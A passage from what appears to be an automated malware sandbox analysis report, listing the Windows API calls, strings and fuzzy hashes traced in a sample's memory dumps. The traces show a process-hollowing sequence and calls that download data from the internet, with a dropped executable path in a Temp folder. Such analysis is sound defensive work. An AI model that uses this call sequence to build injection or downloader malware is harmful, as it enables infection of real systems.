                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00402272
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000), ref: 0040227B
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 00402289
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004022A0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                            • API String ID: 4033543172-1050664331
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0222233C
                                                                                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 02222395
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 022223AE
                                                                                                                                            • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 022223C3
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 022223E6
                                                                                                                                            • GetModuleHandleA.KERNEL32(0042BCFC,0042BCE4,?,00000000,00000000), ref: 022223FE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02222405
                                                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 02222424
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0222243F
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0222247C
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 022224AC
                                                                                                                                            • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 022224C2
                                                                                                                                            • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 022224CB
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 022224D9
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 022224F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4033543172-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0041BA2F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5E5
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B5F7
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B609
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B61B
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B62D
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B63F
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B651
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B663
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B675
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B687
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B699
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6AB
                                                                                                                                              • Part of subcall function 0041B5C8: _free.LIBCMT ref: 0041B6BD
                                                                                                                                            • _free.LIBCMT ref: 0041BA24
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041BA46
                                                                                                                                            • _free.LIBCMT ref: 0041BA5B
                                                                                                                                            • _free.LIBCMT ref: 0041BA66
                                                                                                                                            • _free.LIBCMT ref: 0041BA88
                                                                                                                                            • _free.LIBCMT ref: 0041BA9B
                                                                                                                                            • _free.LIBCMT ref: 0041BAA9
                                                                                                                                            • _free.LIBCMT ref: 0041BAB4
                                                                                                                                            • _free.LIBCMT ref: 0041BAEC
                                                                                                                                            • _free.LIBCMT ref: 0041BAF3
                                                                                                                                            • _free.LIBCMT ref: 0041BB10
                                                                                                                                            • _free.LIBCMT ref: 0041BB28
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: pB
                                                                                                                                            • API String ID: 161543041-3059159000
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0223BC7F
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B835
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B847
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B859
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B86B
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B87D
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B88F
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8A1
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8B3
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8C5
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8D7
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8E9
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B8FB
                                                                                                                                              • Part of subcall function 0223B818: _free.LIBCMT ref: 0223B90D
                                                                                                                                            • _free.LIBCMT ref: 0223BC74
                                                                                                                                              • Part of subcall function 02235711: HeapFree.KERNEL32(00000000,00000000,?,022347F3), ref: 02235727
                                                                                                                                              • Part of subcall function 02235711: GetLastError.KERNEL32(?,?,022347F3), ref: 02235739
                                                                                                                                            • _free.LIBCMT ref: 0223BC96
                                                                                                                                            • _free.LIBCMT ref: 0223BCAB
                                                                                                                                            • _free.LIBCMT ref: 0223BCB6
                                                                                                                                            • _free.LIBCMT ref: 0223BCD8
                                                                                                                                            • _free.LIBCMT ref: 0223BCEB
                                                                                                                                            • _free.LIBCMT ref: 0223BCF9
                                                                                                                                            • _free.LIBCMT ref: 0223BD04
                                                                                                                                            • _free.LIBCMT ref: 0223BD3C
                                                                                                                                            • _free.LIBCMT ref: 0223BD43
                                                                                                                                            • _free.LIBCMT ref: 0223BD60
                                                                                                                                            • _free.LIBCMT ref: 0223BD78
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                            • String ID: B
                                                                                                                                            • API String ID: 161543041-2386870291
                                                                                                                                            • Opcode ID: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction ID: e2f23d962fe699c46897dfbced78c8998b726a406096b887ccc9b09e8a098702
                                                                                                                                            • Opcode Fuzzy Hash: 99c469b85a8334f7860a8521e5f24c60ddfc68edca42f265535503cae86b3820
                                                                                                                                            • Instruction Fuzzy Hash: A2313EB1620706DFEB32AEB9DC84B9A73E9AF04318F644829E459DB158DF34E9518B10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00402351
                                                                                                                                            • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402363
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 0040237A
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238B
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040238E
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0040239F
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004023A2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead
                                                                                                                                            • String ID: <$Microsoft Internet Explorer$runas
                                                                                                                                            • API String ID: 4294395943-436926838
                                                                                                                                            • Opcode ID: 9a32d94c8b7939eb78db467fa39caaccb27089aea047c49b7888cc46b6540ea9
                                                                                                                                            • Instruction ID: 836f0c5934710c0407d646d4299d5f63ee009bd7aa37a993408d58964a26c1b2
                                                                                                                                            • Opcode Fuzzy Hash: 9a32d94c8b7939eb78db467fa39caaccb27089aea047c49b7888cc46b6540ea9
                                                                                                                                            • Instruction Fuzzy Hash: A5410731E00118ABDB18DF65CD45BAEB779EF45300F50846EE915B72C1D7BCAA41CB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00415CB0
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 00415CBC
                                                                                                                                            • _free.LIBCMT ref: 00415CC7
                                                                                                                                            • _free.LIBCMT ref: 00415CD2
                                                                                                                                            • _free.LIBCMT ref: 00415CDD
                                                                                                                                            • _free.LIBCMT ref: 00415CE8
                                                                                                                                            • _free.LIBCMT ref: 00415CF3
                                                                                                                                            • _free.LIBCMT ref: 00415CFE
                                                                                                                                            • _free.LIBCMT ref: 00415D09
                                                                                                                                            • _free.LIBCMT ref: 00415D17
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: c5bf6337fde5a585e6641538013a292c1604a874dfe33c768b4c1d8162f38393
                                                                                                                                            • Instruction ID: 166d972883325de44ce7bdabef546b1d3901efceb99f724343cd7b5bc390e77d
                                                                                                                                            • Opcode Fuzzy Hash: c5bf6337fde5a585e6641538013a292c1604a874dfe33c768b4c1d8162f38393
                                                                                                                                            • Instruction Fuzzy Hash: FA21BB76900618EFCB41EF95C841DDD7FB8AF88344B00556AFA199B121DB35EAC4CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction ID: 395f53575787dba6588f312abc702e351fa947938880f0d51f08c88c420ebde3
                                                                                                                                            • Opcode Fuzzy Hash: 0c21ef880b1d60341a90e459513d1f7c88c2e850a9c3eb24e8f4f9f902a4b7b2
                                                                                                                                            • Instruction Fuzzy Hash: F12167BA920248EFCB52EFD4C840DDD7BB9AF08340B514166E9199B125EB31DB55CF80
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 42983fa42899a2845bcf8f71685504a06bbf48035d5869ea2965793dd411d954
                                                                                                                                            • Instruction ID: 68eb4cd5866e5da1edd4d9018ae4073d6158bda8aeb178e670a8a67cab436560
                                                                                                                                            • Opcode Fuzzy Hash: 42983fa42899a2845bcf8f71685504a06bbf48035d5869ea2965793dd411d954
                                                                                                                                            • Instruction Fuzzy Hash: 2DC104B0A042459FCF15DF99C890BEEBBB4AF49304F04416EE905A7392C7789D86CB6D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F937
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040F93F
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040F9C8
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040F9F3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0040FA48
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 1170836740-3733052814
                                                                                                                                            • Opcode ID: 5b87a8de9a3a4e9407a237a14ae48fbdabd4f8c73af1f505a88c9776c8f57c31
                                                                                                                                            • Instruction ID: 894b8edc5c57a2ad9ab008264311dd0855dc9107bafb368bc8a4d607022375e2
                                                                                                                                            • Opcode Fuzzy Hash: 5b87a8de9a3a4e9407a237a14ae48fbdabd4f8c73af1f505a88c9776c8f57c31
                                                                                                                                            • Instruction Fuzzy Hash: 7651B030B00215AFCF24DF29D840A6E7BA5AF44318F14807BE8086BBD2D7799D09CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 91e8f3a483a69edc9125c39a0c4635ecb12dd4f1569a10ebcb46a17e3b56f603
                                                                                                                                            • Instruction ID: 2a1f976b7b4bcbb86613db8ff6b19fd986a78d3bd4204cc8e7b10c550d2c21a6
                                                                                                                                            • Opcode Fuzzy Hash: 91e8f3a483a69edc9125c39a0c4635ecb12dd4f1569a10ebcb46a17e3b56f603
                                                                                                                                            • Instruction Fuzzy Hash: 1851D571A05301AFDB24AF759881AEB7BB4EF45314F0041BFE51097282EB3D89C68A9D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3409252457-0
                                                                                                                                            • Opcode ID: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction ID: 1392b2d5bbf85628e14ca4388718ab6aa66776e38235571cbe5f8581d5b19296
                                                                                                                                            • Opcode Fuzzy Hash: 0e45cf124dae2680c1abf606a5cb3f97d3ad5a8b58d3201bd65a193797cee207
                                                                                                                                            • Instruction Fuzzy Hash: 3251F2F1E34302EFDB22AFF48880A6D7BB5EF05718F0042BAD8509B199EBB18501CA50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02221EB2
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02221EE3
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02221EF1
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02221F04
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 02221F2E
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 02221F41
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02221FF2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap$AccountLookupName$ConvertFreeLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 856199767-0
                                                                                                                                            • Opcode ID: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction ID: 974790f6157cc615702805aa7bc3287ce773b8b96ee26846a2e6c7f849f45977
                                                                                                                                            • Opcode Fuzzy Hash: 082293e33ad862f9a9c784e4082b52c5111cd68b96a030cc8f3f4a5a10449bd4
                                                                                                                                            • Instruction Fuzzy Hash: 41517075A00219BFDB20DFE4CC88FAFBBBDEF44244F114169E905A3245EB719E059BA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                            • API String ID: 0-537541572
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041B72F: _free.LIBCMT ref: 0041B754
                                                                                                                                            • _free.LIBCMT ref: 0041B7B5
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B7C0
                                                                                                                                            • _free.LIBCMT ref: 0041B7CB
                                                                                                                                            • _free.LIBCMT ref: 0041B81F
                                                                                                                                            • _free.LIBCMT ref: 0041B82A
                                                                                                                                            • _free.LIBCMT ref: 0041B835
                                                                                                                                            • _free.LIBCMT ref: 0041B840
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(?,00403AF0,00000000), ref: 0041735F
                                                                                                                                            • __fassign.LIBCMT ref: 0041753E
                                                                                                                                            • __fassign.LIBCMT ref: 0041755B
                                                                                                                                            • WriteFile.KERNEL32(?,00403AF0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004175A3
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004175E3
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041768F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0040FCFB,0040FB69,0040F477), ref: 0040FD12
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD20
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD39
                                                                                                                                            • SetLastError.KERNEL32(00000000,0040FCFB,0040FB69,0040F477), ref: 0040FD8B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0222FF4B,0222FDB9,0222F6C7), ref: 0222FF62
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0222FF70
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0222FF89
                                                                                                                                            • SetLastError.KERNEL32(00000000,0222FF4B,0222FDB9,0222F6C7), ref: 0222FFDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe, xrefs: 0041A35D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                            • API String ID: 0-1858563875
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsrchr
                                                                                                                                            • String ID: .bat$.cmd$.com$.exe
                                                                                                                                            • API String ID: 1752292252-4019086052
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-
                                                                                                                                            • API String ID: 0-2084034818
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00416612
                                                                                                                                            • GetLastError.KERNEL32(?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104,?), ref: 0041661C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00416623
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001), ref: 0041667B
                                                                                                                                            • GetLastError.KERNEL32(?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104), ref: 00416685
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041668C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040857A
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00408589
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xinvalid_argumentstd::_
                                                                                                                                            • String ID: :::$invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 909987262-1139504419
                                                                                                                                            • Opcode ID: 7830e5d6517efbf6ef1e0939f065e5972ae5a88559e4c9ea959a8c176dd43d04
                                                                                                                                            • Instruction ID: 6e98875f43086b852a1ff0dbe815e623138c5f8adb6bd3c6e19d30da16800a75
                                                                                                                                            • Opcode Fuzzy Hash: 7830e5d6517efbf6ef1e0939f065e5972ae5a88559e4c9ea959a8c176dd43d04
